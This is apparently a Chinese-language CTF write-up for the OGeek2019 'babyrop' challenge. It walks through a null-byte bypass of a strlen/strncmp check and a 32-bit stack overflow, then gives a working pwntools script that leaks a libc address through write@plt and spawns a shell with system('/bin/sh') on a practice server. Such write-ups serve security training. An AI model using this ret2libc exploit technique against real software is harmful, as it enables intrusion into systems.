[OGeek2019]babyrop WP

发布于 2021-10-22  38 次阅读


打开来发现符号表被抹掉了

先获取一个4位宽的随机数

放到buf_main里面

buf_main传参给871F,跟进

检查字符长度

由于strlen可以被\0截断,截断后strncmp被绕过

返回值为buf_7 这个是可控的,暂时忽略,等构造payload的时候再关注具体的值

返回main

进87D0

控制a1大小来控制read大小这里0xFF就很够用了

溢出方面,先把buf和osk溢出掉,rta控制为elf_write_plt

传参elf_write_plt(1,elf_write_got,0x4)

把got的内容吐出来

得到libc_base_addr

再根据libc版本求sys_addr

脚本



#! python
import os
os.environ['PWNLIB_NOTERM'] = '1'
from pwn import *
context(os = 'linux', log_level="debug")
context.terminal=['konsole','--separate','-e','python']
p32 = lambda a : pwnlib.util.packing.p32(a)
u32 = lambda a : pwnlib.util.packing.u32(a)
# io=process("/home/ksroido/Downloads/pwn")
io=remote("node4.buuoj.cn",26061)
# gdb.attach(io,"b *0x08048825")
elf = ELF("/home/ksroido/Downloads/pwn")
libc = ELF("/home/ksroido/Downloads/libc-2.23.so")

libc_system = libc.symbols['system']
libc_sh = libc.search(b'/bin/sh').__next__()
libc_write = libc.symbols['write']

main_addr = 0x08048825
elf_write_plt = elf.plt['write']
elf_write_got = elf.got['write']


payload1 = b'\x00'+b'\xff'*0x7+b'\x00'
io.sendline(payload1)
io.recvuntil('Correct\n')
payload2 = b'a'*231+b'b'*4
payload2 += p32(elf_write_plt)+p32(main_addr)
payload2 += p32(1)+p32(elf_write_got)+p32(0x4)
io.sendline(payload2)
temp = u32(io.recv(4))
print(hex(temp))
print(hex(libc_write))
libc_base_addr = temp - libc_write
system_addr = libc_base_addr + libc_system
libc_sh_addr = libc_base_addr + libc_sh
payload3=b'\x00'+b'\xff'*10
io.sendline(payload3)
io.recvuntil("Correct\n")

payload4 = b'a'*(0xe7+4)+p32(system_addr)+p32(0)
# 0是填充字符

payload4 +=p32(libc_sh_addr)
io.sendline(payload4)



#-------------------------------------------------

# from pwn import *
# context(arch = 'i386' , os = 'linux', log_level="debug")
# context.terminal = "/bin/sh"
# sh=process("/home/ksroido/CTFtemp/ret2text")

# pause()
# target = 0x804863a
# sh.sendline(b'A' * (0x6c+4) + p32(target))
# sh.interactive()

#-------------------------------------------------


io.interactive()